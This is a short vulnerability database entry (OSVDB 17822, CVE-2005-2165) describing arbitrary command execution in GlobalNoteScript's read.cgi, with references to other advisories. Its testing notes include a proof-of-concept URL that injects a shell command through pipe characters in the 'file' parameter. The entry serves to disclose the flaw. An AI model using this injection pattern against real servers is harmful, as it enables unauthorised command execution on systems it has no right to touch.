GlobalNoteScript read.cgi file Variable Arbitrary Command Execution

2005-07-07T04:06:39
ID OSVDB:17822
Type osvdb
Reporter OSVDB
Modified 2005-07-07T04:06:39

Description

Manual Testing Notes

http://[target]/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001

References:

Vendor URL: http://onpumoe.hp.infoseek.co.jp/ Security Tracker: 1014375 Other Advisory URL: http://zone-h.org/advisories/read/id=7765 CVE-2005-2165